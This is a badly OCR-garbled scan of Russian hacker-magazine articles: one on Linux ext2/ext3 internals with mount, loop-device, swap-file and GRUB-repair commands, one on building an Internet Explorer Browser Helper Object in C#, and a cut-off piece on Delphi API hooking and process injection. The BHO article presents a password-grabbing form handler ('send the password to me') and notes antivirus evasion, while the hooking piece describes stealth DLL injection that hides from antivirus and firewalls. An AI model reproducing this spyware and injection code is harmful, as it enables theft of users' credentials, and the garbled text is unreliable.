зкгисЦ зешаркоге з_1оск; 



} 

Битовой картой блоков (Ыоск Ьіітар) называется структура, 
каждый бит которой показывает, отведен ли такой же по счету 
блок какому-либо файлу. Значение «1 » показывает, что блок 
занят. Эта карта служит для поиска свободных блоков в тех 
случаях, когда надо выделить место под файл. Битовая карта 
индексных дескрипторов выполняетаналогичную функцию по 
отношению ктаблице индексных дескрипторов: показывает, 
какие именно дескрипторы заняты. 

Каждому файлу соответствует один и только один индексный 
дескриптор (іпосіе), который идентифицируется своим поряд- 
ковым номером — индексом файла. В индексном дескрипторе 
хранятся метаданные файла. Среди них — все атрибуты файла, 
кроме его имени, иуказатель на данные файла. 

Для обычного файла или каталога этотуказатель представляет 
собой массив из пятнадцати адресов блоков. Первые двенад- 
цать адресов являются прямыми ссылками на номера блоков, 
в которых хранятся данные файла. Если данные не помеща- 
ются в двенадцать блоков, то включается механизм косвен- 
ной адресации. Следующий адрес в этом массиве является 
косвенной ссылкой, то есть адресом блока, в котором хранится 
списокадресов следующих блоков с данными из этого файла. 
Сколько блоков с данными можно так адресовать? Адрес блока 
занимает4 байта, блок, какуже сказано, имеет размеры 1, 2 
или 4 Кб. Значит, путем косвенной адресации можно размес- 
тить 256 — 1 024 блока. 

Аесли файл еще длиннее? Следующий адрес в массиве- 
указателе указывает на блок двойной косвенной адресации 
(боиЫе іпсіігесі: Ыоск). Блок содержит список адресов блоков, 
которые, в свою очередь, содержат списки адресов следующих 
блоков данных. 

Наконец, последний адрес в массиве-указателе задает адрес блока 
тройной косвенной адресации, то есть блока со списком адресов 
блоков, которые являются блоками двойной косвенной адресации! 
Пока остается непонятным, где находится имя файла, если 
его нет ни среди данных файла, ни среди метаданных. В *піх- 
подобных системах имя файла — атрибут не самого файла, 
а файловой системы, понимаемой каклогическая структура 
каталогов. Имя файла хранится только в каталоге, к которому 
файл приписан, и больше нигде. Следствия этого любопытны. 
Во-первых, одному индексному дескриптору может соответство- 
вать любое количество имен, приписанных к разным каталогам, 
и все они являются настоящими. Количество имен (жестких 
ссылок) учитывается в индексном дескрипторе. Именно это 
количество можно увидеть по команде «Із — I». Во-вторых, уда- 
ление файла означает простое удаление записи о нем изданных 
каталога и уменьшение на единицу счетчика ссылок. В-третьих, 
сопоставить имя можно только номеру индексного дескрипто- 
ра внутри одной и той же файловой системы. Именно поэтому 
нельзя создать жесткую ссылку в другую файловую систему 
(символическую — можно, у нее другой механизм хранения). 

Сам каталог та ким же образом приписан к своему родитель- 
скому каталогу. Корневой каталог всегда записан в индексный 
дескриптор с номером «2» (номер «1 » отведен для списка ад- 
ресов дефектных блоков). В каждом каталоге хранится ссылка 
на него самого и на его родительский каталог — это и есть псев- 
доподкаталоги «.» и «..». Таким образом, количество ссылок на 
каталог равно количеству его подкаталогов плюс два! 

Данные каталога представляют собой связный список с 
записями переменной длины и выглядят примерно так, как 
показано на рисунке 3. 

А какже файлы физическихустройств? Они могут находиться в 
тех же каталогах, что и обычные файлы: в каталоге нет никаких 




> ІП^О 

• ѴЕ5 действует как 
корневой уровень 
интерфейса файловой 
системы. ѴР5 следит 
за всеми поддержи- 
ваемыми и смонтиро- 
ванными на данный 
момент файловыми 
системами. 

• Узел іпосіе хранит 
в себе все метадан- 
ные для управления 
объектами файловой 
системы. 

• Структуры сіепігу 
используются для 
осуществления пре- 
образования между 
названиями и узлами 
іпосіе, для чего сущест- 
вует кэш директорий, 

в котором хранятся 
последние исполь- 
зованные записи, а 
также отношения меж- 
ду папками и файлами 
для обхода файловых 
систем. 

• Буферный кэш 
буферизирует запросы 
между файловыми 
системами и блочны- 
ми устройствами. 

• Дубликаты супер- 
блока используются 
при восстановлении 
файловой системы 
после сбоев. 

• В статье «Через 
революцию кэволю- 
ции», опубликованной 
в журнале ] [а кер #095, 
можно прочитать 
историю создания 
линуксовых файловых 
систем. 
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Рис. 1 . Архитектура файловой системы 



данных, говорящих о принадлеж- 
ности имени файлу на диске или 
устройству. Разница — на уровне 
индексного дескриптора. Если 
иноде обычного файла указывает 
на дисковые блоки, где хранятся его 
данные, то в иноде файла устройст- 
ва содержится указатель на список 
драйверов устройств в ядре — тот 
элемент списка, который соответ- 
ствует ста ршемуномеру у стр о й ств а 
(рис. 4). 

0 МОНТИРОВАНИЕ 

Чтобы получить доступ к файлам и 
каталогам, находящимся на других 
разделах жесткого диска или на 
других носителях, нужно примон- 
тировать их ккорневой файловой 
системе. Для монтирования фай- 
ловой системы предназначена программа тоипі, для размонтирования 
— итоипС Общий форматвызова следующий: 

# тоипЕ — Е тип_ФС устройство точка_монтирования 

После монтирования ФС добавляется в списоксмонтированных файловых 
систем в ядре: 

зЕгисЕ ѵЕзтоипЕ { 

зЕгисІ 1ізЕ_Ьеасі тпЕ_Ъ.аз1і; 
зЕгисЕ ѵЕзтоипЕ *шпЕ_рагепЕ; 
зЕгисЕ сІепЕгу *шпЕ_шоипЕроіпЕ ; 
зЕгисЕ СІепЕгу *шпЕ_гооЕ; 
зЕгисЕ зирег_Ыоск *шпЕ_зЬ; 
зЕгис! 1ізЕ_Ьеасі шпЕ_шоипЕз ; 
зЕгисЕ 1ізЕ_1іеасі шпЕ_с!іі1(і; 
аЕошіс_Е шпЕ_соипЕ; 
іпЕ тпЕ_Е1адз; 
сііаг *шпЕ_сіеѵпаше ; 
зЕгисЕ 1ізЕ_1іеасі шпЕ_1ізЕ; 

} 

Последняя структура тпѣ_1ізІ и есть список смонтированных файловых 
систем. Пользователь может просмотреть его в файле /еІс/тіаЪ. 

Я ОСОБЫЕ ОПЕРАЦИИ С ФАЙЛОВОЙ СИСТЕМОЙ 

Создать файловую систему І_іпих можно не только на физическом носителе 
данных, но и в обычном файле. Для начала нужно создать пустой файл: 




Рис. 2. Структура файловой системы 



# сМ іЕ=/аеѵ/гего оЕ=Ез.ітд Ъз=1к соипЕ=30000 

Команда бб читает данные из псевдоустройства /сіеѵ/гего и записывает 
их в файл Из . ітд. В качестве данных будет поток нулей, причем не чисел 
ноль (АЫЗІ-код 48), а неотображаемых символов І\]ІЛ_І_ (АЫ5І-код 0)! Данные 
читаются и записываются блоками по 1 Кб (Ьв=1 к), а общее количество 
блоков равно 30000. Таким образом, на выходе получаем файл размером 
-30 Мб, заполненный символами N I) ЬІ 

Командой Іозеіир превратим наш файл в блочное устройство: 

# ІозеЕир /(беѵ/1оор0 Ез.ітд 

Теперь мы можем обращаться к /сіеѵ/ІоорО, как к обычному блочному 
устройству (блочным называется устройство, обмен данными с которым 
производится блоками, например, секторами диска). 

Создадим файловую систему на устройстве /деѵ/ІоорО с помощью команды 
тке2Лз : 

# тке2Ез -с /сіеѵ/ІоорО 30000 

Все готово для монтирования созданной файловой системы! Мы подмонти- 
руем ее к каталогу /тпъ/із, который нужно создать заранее: 

# тксііг /тпЕ/Ез 

# тоипЕ -Е ехЕ2 /сіеѵ/ІоорО /тпЕ/Ез 

После этого можно работать с каталогом /тпі/Из как с обычным каталогом 
файловой системы. Никаких ограничений нет. Внутри этого каталога мы 
можем создать еще один пустой файл и тоже превратить его в файловую 
систему, а затем подмонтировать. 

Для упрощения процесса вместо команды Іозеіир можно применить 
параметр ' -о Іоор' команды тоипѣ, например: 

# шоипЕ -о Іоор -Е ехЕ2 Ез.ітд /тпЕ/Ез 

Для размонтирования файла с файловой системой, как обычно, используем 
игпоипЕ 

# ишоипЕ /тпЕ/Ез 

Далее следует удалить устройство /сіеѵ/ІоорО: 

# ІозеЕир -сі /сіеѵ/ІоорО 

В АІ-СОНОІ- И ІЛ-ТКАІ50 СРЕДСТВАМИ ЫЫІІХ! 

Теперь немного практики. Например, <іс? можно использовать не только для 
создания пустых файлов, но и для снятия образов с СО/ОѴО-дисков: 

# аа. іЕ=/аеѵ/сагош оЕ=~/ітаде.ізо 

Данная команда создастобраз Сй-диска и запишетего в домашний каталог 
пользователя под именем ітаде . ізо. 



Ноыф іп-иіі* 


Дни а тагакіі 


Дтгіш іі'кші файла 


Имя файла 


Номер іиойе 


Д'ИІН.і ЭаГПГСН 


ДШИЛ 1СМСЕОЕ 'І'ПІ'П.і 




ІІШ фШ'ПЛ 




Номер іиоік 


Дим л ?апік]і 


Дшсз.і ішеіаі файла 


1 ІМЯ фДГПА 



Рис.З. Структура каталога в ехіЗ 
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Рис. 4. Разница между обычным файлом и файлом устройства 



Затем можно обратиться к файлам созданного образа без за- 
писи его на болванку. Для этого нужно подмонтировать исошку 
к корневой файловой системе (каталог /тп ѣ /Із должен 
существовать): 

# тоипк -о Іоор -Ь Ізо9бб0 -/ітаде.ізо /тпк/бз 



подключает созданный своп-файл ксистеме. Можешь 
ввести команду ігее, чтобы убедиться, что файл подкачки 
подключен. Только не забудь добавить последнюю команду 
в сценарии запуска системы, чтобы не вводить ее после 
каждой перезагрузки. 

^ МОНТИРОВАНИЕ КАТАЛОГА К КАТАЛОГУ 

В І_іпих можно подмонтировать каталог к каталогу, а не только 
каталог к устройству. Делается это с помощью все той же 
команды тоипТ но запущенной с параметром '--Ыпд.': 

# шоипС --Ъіпсі исходный_каталог каталог_на- 
значения 

^ ИЗМЕНЕНИЕ КОРНЕВОЙ ФАЙЛОВОЙ СИСТЕМЫ 




> Ііпкз 

На Википедии 
( ги.ѵѵікіресііа.огд ) 
можно найти кучу 
материалов, посвя- 
щенных файловым 
системам. Для поиска 
используй ключевые 
слова: ех{2, ехіЗ, 
геізеНз, (иве, ззЫз. 



І_іпих позволяет изменять корневую файловую систему. 
Предположим, ты загрузился с ЫѵеСО и теперь нужно подклю- 
чить корневую файловую системутак, чтобы все изменения, 
производимые вводимыми командами, относились именно к 
корневой файловой системе на жестком диске, а не к корневой 
файловой системе ЫѵеСО. И вот, как это сделать: 



Теперьты можешь работать с /тпѣ/Из, как с обычным ката- 
логом. 

Но работа с 150-образами — не единственное применение 
Іоор-устройств. Может случиться так, что после установки сис- 
темы окажется, что оперативной памяти не хватает. Покупать 
дополнительный модуль памяти не хочется, а переразбивать 
жесткий диске целью увеличения размера раздела подкачки 
— тем более. Можно создать пустой файл, отформатировать 
его как файл подкачки и подключить к системе: 

# гпксііг /змар 

# сісі іб=/(5еѵ/2его об=/зѵ7ар/зѵ7-іі1е Ъз=1к 
соип1:=262144 

# ткзмар /зѵ/ар/зм-бііе 262144 

# зѵѵароп /зѵѵар/зѵѵ-бііе 

Первая команда создает пустой файл размером 256 Мб. 
Вторая — форматирует его как своп. Для І_іпих нет особой 
разницы, с чем работать — с файлом или с блочным 
устройством. Ты запросто можешь отформатировать 
обычный файл в любую файловую систему. Третья команда 



# сЬгооР точка_монтирования 
Например: 

# сЬгооР /ітк/пешгоок 

^ ВОССТАНОВЛЕНИЕ ЗАГРУЗЧИКА ЗКІШ: ПОШАГО- 
ВОЕ РУКОВОДСТВО 

После переустановки ѴѴіпсІоѵѵз внедрила в МВР свой загруз- 
чик, и теперь нельзя загрузить І_іпих? Не переустанавливать 
же еще и І_іпих из-за такой мелочи! Для восстановления за- 
грузчика 6Р1Ш бутимся с любого ЫѵеСО и вводим следующие 
команды: 

# тксііг -р /оісі/сіеѵ 

# тоітк /сіеѵ/зсіах /оіеі 

# тоітС --Ьіпсі /сіеѵ /оісі/сіеѵ 

# сЬгоок /оіеі 

# /зЬіп/дгиЬ-іпзбаІІ /сіеѵ/зсіа 

# геЪоок 




Щ ВМЕСТО ЗАКЛЮЧЕНИЯ 

К сожалению, мы рассмотрели далеко не все 
возможности файловой системы І_іпих. В 
частности, не были рассмотрены права дос- 
тупа, квотирование, практически ничего не 
сказано о создании ссылок. Все это темы для 
отдельного разговора, а пока, если у тебя есть 
вопрос ы/комментарии/п оже л а н и я , м оже ш ь 
обращаться по адресу сІЬзі Іа Ьзй та іі.ги . □С 




Рис 5. Создание и монтирование файла с файловой системой 



Рис 6. Создание и подключение своп-файла 
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УЧИМСЯ КОДИТЬ МОДУЛИ ПОДДЕРЖКИ ОБОЗРЕВАТЕЛЯ 



Полезная вещь — ВНО. Большое количество коммерческих прогр 



менедже^^^шкачки до словареи-переводчиков — так или иначе 



щих досту п^кб раузеру, встраиваіот своих^юмощнико^^Іп^^^^с^Іо^^^ 



В статье мы расскажем, как средствами С# и МісгозоН Ѵізиаі Зшсііо соз дать 

ѵ / к Ч 

собственный модуль. Естественно, с немного хакерскими функциями 



г СОМ — СОМРОЫЕЫТ (ШЕСТ МОйЕЬ 

Спектр возможного применения ВНО огромен — отпростого шпионского 
модуля, который отслеживает вводимые данные, до подмены содержимого 
веб-страниц и перенаправления запросов пользователя. Ему позволено 
практически все! Но сначала —теория. 

Технология СОМ разрабатывалась, чтобы сделать приложения более 
гибкими и настраиваемыми. Первоначальной целью была поддержка 
концепции, известной каксвязывание и внедрение объектов (оЬіесІ Ііпкіпд 
апсі етЬебсІіпд). Реализация, созданная в МісгозоЙ, получила название 
ОБЕ. Первая версия ОБЕ для связи между клиентом и компонентом исполь- 
зовала динамический обмен данными (бупатіс баіа ехсбапде — ОйЕ). В 
01_Е 1 не было СОМ, ййЕ был построен на основе архитектуры передачи 
сообщений ѴѴіпсІоѵѵз. Лучшее, что можно сказать об 01_Е 1 , это то, что он все 
же работает — более или менее. Во-первых, ОБЕ медлителен. Во-вто- 
рых, написать корректно работающий код ййЕ сложно. Вдобавок, 00Е не 
отличается надежностью и гибкостью. Другими словами, рано или поздно 
должны были изобрести что-нибудь получше. 

Решением стала СОМ — меньше, быстрее, гибче, надежнее, чем 00Е. Вторая 
версия 01_Е была переписана с использованием СОМ, и именно СОМ стала 



новым фундаментом, на котором выстроены конструкции 01_Е. Однако 01_Е 
— первая система на основе СОМ, и как любой первый блин, представляет 
собой не лучший пример использования его возможностей. По ряду причин 
ОБЕ заслужил репутацию сложного, медленного и трудного для программи- 
рования аппарата. Впрочем, это, скорее, недостатки реализации, а не СОМ. 
СОМ — больше, чем просто спецификация. В СОМ есть АРІ; это библиотека, 
предоставляющая сервисы управления компонентами. Если ты разрабаты- 
ваешь компоненты в стиле СОМ не для ѴѴіпсІоѵѵз, то большинство функций 
этого АРІ несложно реализовать самостоятельно. Библиотека СОМ создана, 
чтобы гарантировать единообразное выполнение всеми компонентами 
наиболее важных операций. Она экономитвремя разработчикам, создаю- 
щим собственные компоненты и клиенты. Большая часть кода в библиотеке 
СОМ служит для поддержки распределенных или сетевых компонентов. 
Реализация распределенной СОМ ЮізІхіЬійесІ СОМ, ОСОМ) в системах 
ѴѴіпсІоѵѵз предоставляет код, необходимый для обмена информацией с ком- 
понентами по сети. Это избавляет нас нетолько от необходимости писать 
такой код, но и от необходимости знать, как это делать! 

Самое главное в СОМ — это интерфейсы. Через них клиент взаимодейству- 
ете компонентом. Они похожи на элементы каркаса сборного дома — кар- 
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ка с задает структуру, без которой крыша и стены не защитят 
жителей. Если мы не трогаем каркас, дом остается «струк- 
турно»тем же самым. Замена стен влияеттолько на внешний 
вид. Аналогично этому, замена компонентов может изменить 
поведение приложения, но не его архитектуру. 

Одно из самых больших преимуществ компонентной модели 

— возможность повторного использования архитектуры 
приложения. Просто разрешив заменять некоторые ключевые 
компоненты, мы добиваемся того, что одна и та же архитектура 
может поддерживать несколько различных приложений. 
«Причем тут ВНО?», спросишьты. Дело втом, что ВНО, 
который мы хотим написать, и есть СОМ-объект, реализующий 
интерфейс ІОЪз есШіѣЪЗИе и подключающийся к Іпіегпеі 
Ехріогег. Наш продукт будет воспринимать ІпІгепе{ Ехріогег 
всего лишь как набор интерфейсов, которые и нужно реализо- 
вать в нашей программе. 

В ЧТО ТАКОЕ ВНО? 

Если в двух словах, то объект ВНО является компактным 
расширением в виде ОІ_І_-библиотеки, дополняющим обо- 
зреватель Іпіегпеі: Ехріогег пользовательскими функциями 
(менее распространен случай, когда их добавляют к оболочке 
ѴѴіпсіоѵѵз ЗЬеІІ]. 

Какправило, объекты ВНО не имеют собственного поль- 
зовательского интерфейса и существуют в виде простой 
библиотеки, которую ІЕ подгружает при старте. ВНО работают 
в бэкграунде, реагируя на события обозревателя и действия 
пользователя. Например, могут блокировать всплывающие 
окна, автоматически заполнять формы или реагировать 
на движения мыши. Типичным является заблуждение, что 
объекты ВНО требуются для создания расширений панели 
инструментов (тулбаров). Тем не менее, в сочетании с ними 
ВНО может предоставить пользователю расширенные воз- 
можности. 

Объекты ВНО удобны и для разработчиков — время жизни 
объекта ВНО совпадаетсо временем жизни экземпляра обоз- 
ревателя, с которым он взаимодействует. В Іпіегпеі Ехріогег 
6 и более ранних версиях это означаетсоздание нового объек- 
та ВНО (и его уничтожение) для каждого окна верхнего уровня, 
а в Іпіегпеі: Ехріогег 7 — для каждой вкладки. Объекты ВНО 
не загружаются другими приложениями, которые используют 
элементуправления МеЪВгстзег, или окнами, использующи- 
ми НТМІ_ (например, диалоговыми окнами). 

Итак, поехали... 

В СОЗДАЕМ ВНО 

Основное требование к объекту ВНО — наличие реализации 
интерфейса ІОЪз есШііЪЗіЪе. Этот интерфейс предостав- 
ляет метод ЗеѣЗі бе, который обеспечивает первоначальный 
обмен информацией с Іп1:егпеІ Ехріогег и уведомляет объект 
ВНО о подготовке к освобождению [ігее). Создав простое 
расширение для обозревателя с помощью этого интерфейса, 
мы добавим идентификатор СІ_5Ю объекта ВНО в реестр. 

Для начала создадим новый проектСІазз ЫЬгагу в Ѵ5. Не 
забудь добавить к проекту ссылки на две внешние библиотеки 

— ЗНОосѴымМЗНТМЬ [ ЗНОосѴы — путем добавления биб- 
лиотеки зМосѵѵѵ.сІІІ, которая лежит в папке %зузІетгооі:%/ 
зузІет32). Кроме этого нужно подключить дополнительное 
пространство имен Зузіет. Кипііте . ІШегорЗегѵісез и 
МісгозоІІ . Міп32. 

Наш ВНО будет состоять из двух раздельных классов — пер- 
вый ( Ьидада } содержит в себе определение интерфейса 
ІОЪз есШіѣЪЗіѣе (в свою очередь, включает прототипы 
двух функций — СеІЗіІе и ЗеІЗіІе) и второй ( Іипсііопаі ), 
который будет реализовывать всю необходимую функцио- 



нальность. В нашем проекте, кроме определений методов 
СеІЗіІе и ЗеІЗіІе, нужно предусмотреть реализацию 
метода ОпОосшпепІСотрІеѣе. Эта функция является частью 
класса СОНітЮіаІод и вызывается при завершении загруз- 
ки страницы (подробности смотри на Ыір://т5сіп2.тісг050ІІ. 
сот). Т акже добавим две переменные — МеЪВгомзег и 
НТМЬОоситепѣ . Они позволят получить доступ ксодержимому 
веб-страницы. 

Теперь очень важный шаг — чтобы получить возможность 
аттачиться кІЕ, нужноуказать ссылку на 61ІЮ интерфейса 
ІОЪз есШіѣЪЗИ:е — ЕС4801АЗ-2ВА9-11СЕ-А229- 
00АА003И7352. Обычно он прописывается в этих двух ветках 
реестра: НКЕУ_СЬАЗЗЕЗ_В00Т\Іпі:егІасе\ {ЕС4801АЗ- 
2ВА9 -11 СЕ-А229 - О ОАА 00307352} И НКЕУ_ЬОСАЬ_ 
МАСНІЫЕ \ ЗОЕТМАКЕ \СІаззез\Іпі: егіасе \ {ЕС 4 801АЗ - 
2ВА9-11СЕ-А229-00АА003Б7352 } . 

И это же надо сделать при описании интерфейса 
ІОЬіесіѴѴіШЭіІе путем добавления атрибута [СотѴізіЫе(ігие)]. 
Добавив 61)1 0 к описанию, добавим то же самое, но уже 
в код самого ВНО. Затем описываем функциональность 
методов беіБііе и ЗеіЗііе. Реализация этих методов 
проста: 

МЕТОД 6ЕТ5ІТЕ 

риЫіс іпб Себ5ібе( 
геб Сиісі диісі, 
оиб ІпбРбг ррѵЗібе) 

{ 

ІпбРбг роіпбег = 

МагзЪаІ .СебІШкпоѵтРогОЪзесб (меЪВгомзег ) ; 

іпб басе = МагзЬаІ . Оиегуіпбегбасе ( 
роіпбег, геб диісі, оиб ррѵЗібе) ; 

МагзЬаІ .Кеіеазе (роіпбег) ; 

гебигп басе; 

} 

В приведенной выше функции ОеЫПпкпошіЕогОЪз есб 
мы получаем описатель интерфейса Шпкпомп для нашего 
браузера. Осталось только добавить идентификатор СІ_5Ю 
объекта ВНО в реестр. Эта запись описываетбиблиотеку 0І_І_ 
как объект модуля поддержки обозревателя и заставляет 
обозреватель ІЕ загружать объект ВНО при запуске. Среда 
Ѵізиаі Эіисііо можетзарегистрировать идентификатор С1_5Ю 
во время сборки проекта. Запомни: все ВНО для I пбегпеб 
Ехріогег регистрируются вот в этой ветке реестра :НКЕУ_ 
ЬОСАЬ_МАСНШЕ \ 50ЕТШЕЕ\Мі сгозоі б \ ШпЪстз \ 
СиггепІѴегзіоп\Ехр1огег\Вгомзег Неірег 
ОЪзесІз. 




> Ііпкз 

Тема создания ВНО 
широко обсужда- 
ется на форумах 
геаісосііпд.пеі: . 
доісіоіпеі.ги и, ко- 
нечноже, М50ІЧ. 




> СІѴСІ 



На дискеты найдешь 
написанный на С# 
вариант реализации 
ВНО. 




> ІП^О 

Программирование 
ВНО советую начать 
с изучения СОМ, 
например, с книги 
Дейла Роджерсона 
«Основы СОМ»: ѵѵѵѵѵѵ. 
робдогеізку.сот/ 
сІаззісз.ЫтІ . 
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Делаем это так: добавляем еще одну функцию гедізіегдля регистрации ВНО 
и передней ставим атрибут [сотКедізЕегРипсЫоп]. Далее запускаем 
утил иту КедАзт . ехес ключом /сосІеЪазе. Она зарегистрирует нашу 
сборку и — вуаля! — в вышеуказанном ключе реестра появляется строка с 
СІ_5Ю. Это и есть наш ВНО! 

Маленькое лирическое отступление: если ты собираешься использовать 
ВНО для своих грязных целей, имей в виду, все антивири и файры посто- 
янно отслеживаютзапись в указанную ветку реестра. Поэтому регистра- 
ция ВНО в системе — вещь крайне шумная и неудобная. 

г тырим пароли... 

Для более полного контроля за действиями пользователя необходимо будет 
реализовать обработку событий класса МеЪВгомзег, например события 
опВеНогЫаѵі даІе2. 

Код, который будет собирать пароли с форм веб-страниц, может выглядеть 
так: 

риЫіс ѵоій ОпВебогЫаѵідабе2 (геб оЪдесбТагдебЕгатеЫате, 
геб оЪ^есб РозбБаба, 
геб оЪ^есб Неасіегз, 
геб Ъооі Сапсеі) 




Добавляем 61ІЮ 



{ 

сЗ-Оситепб = (тзіібті . НТМЬБоситепб ) меЪВгсжзег . Босшпепб ; 
богеасЬ. (шзіібші . ІНТМЬІприбЕІешепб еі 
іп сіосишепб . дебЕІешепбзВуТадЫаше ( " іприб " ) ) 

{ 

іб (еі . буре .ТоЬсжег ( ) == "раззѵгогсі" ) 

//шлем пароль мне. . . 

} 

} 

Воти все! Созданный нами ВНО невеликв размере, но вполне работоспо- 
собен. В принципе, в создании ВНО нет ничего сложного, главное — иметь 
представление о работе СОМ-компонентов. 

^ ЗАКЛЮЧЕНИЕ 

Логично предположить, что ВНО популярны как среди добрых и чест- 
ных разработчиков, которым требуется расширение функциональности 
обозревателя, так и среди недобрых дяденекхакеров, которые пытаются 
поставить под контроль твои действия в интернете. На диске ищи готовый 
код ВНО, который, проявив смекалку, можешь без проблем расширить под 
свои замыслы. Ещоу! 




Добавлям зМосѵѵѵ.сШ. 
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КРАТКИМ КУРС ПЕРЕХВАТА ФУНКЦИИ В ОЕІ.РНІ 






В одн ом из номеров нашего жур>на_лав рубрике РА О бы л заданлз опрос: « 




мож но перехватить данные, отправляемые се тев ым приложен и ем?» . В от- 

7 іЗШѴі нвш шпін 

тевых утилит — ІР Тооіз. Возможности ѴѴтВоск коокег мне н астольк о по нра- 
шлись, что я решил написать свой вариант подобной программы. И в этой 



статье хочу поделиться с тобой опытом, полученным при разработке. 



н теория 

Начнем с теории, которую, правда, и так знает большинство наших 
читателей. Все АРІ -функции определены в динамических библиотеках. 
Сразу возникает вопрос: «Откуда приложение знает, в какой библиоте- 
ке объявлена нужная функция?». Ответ прост — в любом РЕ-файле есть 
область, называемая таблицей импорта. В ней перечислена информа- 
ция обо всех импортированных функциях, необходимых для корректной 
работы. Загрузчик РЕ считывает эту инфу и подгружает необходимые 
библиотеки в адресное пространство процесса программы. Например, 
чтобы узнать список всех ВІ_І_, подгруженных в адресное пространство 
процесса, можно воспользоваться утилитой от Марка Руссиновича 
«Ргосезз Ехріогег». Взгляни на рисунок, на нем отображен список ОІ_І_ 
процесса Орега . ехе. 

Обрати внимание на выделенную в нижней части окна «Ргосевэ 
Ехріогег» библиотеку ОІ_І_ с именем Р 132_32 . 6.11. В ней определен весь 
набор сетевых функций ѴѴіпБоск АРІ второй версии. Одну из функций 
этой библиотеки нам предстоит сегодня научиться перехватывать. В 
перехвате нет ничего нетривиального. Все, что требуется от програм- 
миста, так это заставить процесс жертвы обращаться не к системной 
функции, а к нашей — подставной. Дальше остается только командовать. 
Перехватить АРІ-функции можно несколькими способами. Вот самые 
популярные: 

1. Редактированиетаблицы импорта. Наверное, способ является самым 
известным и ужточно самым простым. Суть метода заключается в следую- 



щем. В таблице импорта РЕ-файлов содержатся адреса всех импортируе- 
мых функций. Для перехвата необходимо пробежаться по этой табличке, 
найти адрес функции, которую мы будем перехватывать, и поменять его 
на адрес функции, определенной нами. Совершив эту нехитрую манипу- 
ляцию, мы сможем обрабатывать все вызовы перехватываемой функции. 
Несмотря на простоту реализации, нас подстерегает несколько досадных 
огорчений. Самое главное, что не все функции могут вызываться через 
таблицу импорта. 

2. Модификация кода системной функции. Для реализации этого спо- 
соба необходимо «пропатчить» перехватываемую функцию, а именно 
записать в самом ее начале переход на подставную функцию. Тогда все 
обращения к оригиналу будут попадать на функцию-подставу. Тут важно 
не забыть сохранять значение перезаписываемого участка памяти, 
иначе можно попрощаться с корректной работой приложения жертвы. 

У метода есть как плюсы, так и минусы. Из достоинств можно выделить 
возможность перехвата абсолютно любых функций, то есть не только тех, 
что определены в таблице импорта. Среди минусов — вероятность появ- 
ления ошибок в многопоточных приложениях. Хотя при наличии головы 
на плечах это достаточно легко обходится. В качестве способа лечения 
подходит банальная остановка всех потоков приложения и их запуск 
после установки перехвата. Перехват АРІ удобнее всего осуществлять в 
контексте процесса «жертвы», поэтому необходимо внедрить свой код в 
удаленный процесс. Существует несколько «устаканившихся» вариантов 
вторжения в чужие процессы: 
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1 . Внедрение образа своего процесса. Позволяет целиком внедрить 
свое приложение в чужое адресное пространство. Удобство такого 
способа в том, что можно обойтись без всяких лишних 066, повы- 
сив скрытность. Даже если жертва воспользуется утилитами вроде 
РгосеззЕхрІогег, то не увидит ничего необычного. 

2. Внедрение подготовленной 0І_І_. Этот вариант можно назвать 
классическим. Для его реализации нужно создать ВІ_І_, в которой будет 
организован один из способов перехвата, и приложение, которое будет 
инжектировать ее в нужный процесс. Один из минусов я уже озвучил, 
поэтому перейду сразу к плюсам. Главный плюс состоит в возможности 
прописывания ОІ_І_ в реестре, после чего она будет автоматически загру- 
жаться. В результате исключается необходимость в написании програм- 
мы для внедрения ОІ_І_. 

У многих может сложиться впечатление, что перехват — дело объемное 
и сложное. Действительно, реализовать метод внедрения и перехвата 
— задача не самая простая, но йеІрЫ программистам сильно повезло. С 
легкостью организовать перехват функций и внедриться в чужой процесс 
поможет модуль адѵНоокАрі, написанный гениальным программером 
Мз-Вегп. Модуль спроектирован качественно, все функции удобно 
описаны, код оформлен красиво. Единственное разочарование втом, что 
сегодня уже нельзя выразить респект автору. Этот человек мертв. Очень 
грустно, что гениальных людей так рано забираетсмерть. 

0 ХАКЕРСКИЙ МОДУЛЬ 

Итак, давай посмотрим, какими возможностями может похвастаться дан- 
ный модуль. 

1. Внедрение кода вудаленный процесс. Выше я рассказывал о нескольких 
вариантах внедрения своего кода в адресное пространство чужого процес- 
са. В адѵНоокАРІ реализованы следующие методы: 

• Внедрение 0І_І_ в чужой процесс. Метод реализуется с помощью функции 
Іп^есЬБИ () , которая описана следующим образом: 

Іоп Іп^есбБЫ (Ргосезз : сЫогЬ; МосІиІеРабІі: РСЬаг) : 
Ьооіеап; 

В качестве параметров нужно передать дескриптор процесса, в который бу- 
дем внедрять сіи, и путь ксамой библиотеке. В случае успешного внедрения 
результат будет Ъгие. 

• Скрытое внедрение 0І_І_. Функция іпзесѣОІІЕх () внедряет 0І_І_ и 
производит шаманские действия над образом ОН в памяти. Послетаких 
настроек многие программы (антивирусы, персональные Еігеѵ/аіі) 



начинают нервно курить и не замечать черных дел твоей программы. 

• Внедрение произвольного ехе-файла. Осуществляется при помощи 
функции ІпзесііЕхе ( ) . 

бипсбіо Іп^есбЕхе (Ргосезз : йѵгогсі; 

Баба: роіпбег) : Ьооіеап; 

Для работы функции требуется передать два параметра: 

1 . Дескриптор [Ьапбіе] процесса, в который будем внедряться. 

2. Адрес образа файла в текущем процессе. 

• Инъекция образа текущего процесса. Функция ІпзесЬТЪізЕхе ( ) 
будет полезна, когда не хочется или нет возможности юзать библиотеки 
066. Описание функции и параметров приводить не стану, так как они 
стандартные и ничем не отличаются от описания предыдущей. 

• Внедрение в процесс процедуры. 

Гипс б іоп Іпз есбТЬгеасІ ( Ргосезз : сіѵгогсі; ТЬгеасІ: роіпбег; 
Іпбо: роіпбег; ІпбоЬеп: Ьѵгогсі; 

Кезиібз: Ьооіеап) : ТНапсИе; 

У функции пять входных параметров: 1 . Ргосезз — дескриптор процесса. 

2. ТЬгеасі — указатель на процедуру, которую будем внедрять. 3. ІпЕо — ад- 
рес данных для процедуры. 4. ІпРоЬеп — размер передаваемых данных. 
б.Еезиібз — необходимость возврата результата (если ігие, то функция 
вернет переда иные данные). 

2. Перехват ѴѴіпсіоѵѵбАРІ. В модуле определено две функции для установки 
перехвата: 

бипсбіоп НоокСоЬе (ТагдебРгос , ЫеѵіРгос: роіпбег; 
ѵаг ОШРгос: роіпбег) : Ьооіеап; 

Первая устанавливает перехват нужной функции. В качестве параметров 
просит: 1 . ТагдеѣРгос — адрес перехватываемой функции. 2 .ЫеъѵРгос 
— адрес функции, которая будет вызываться вместо перехватываемой. 3. 
ОЫРгос — переменная, в которой будет сохранен адрес моста к ориги- 
нальной функции (пригодится, когда потребуется остановить перехват и 
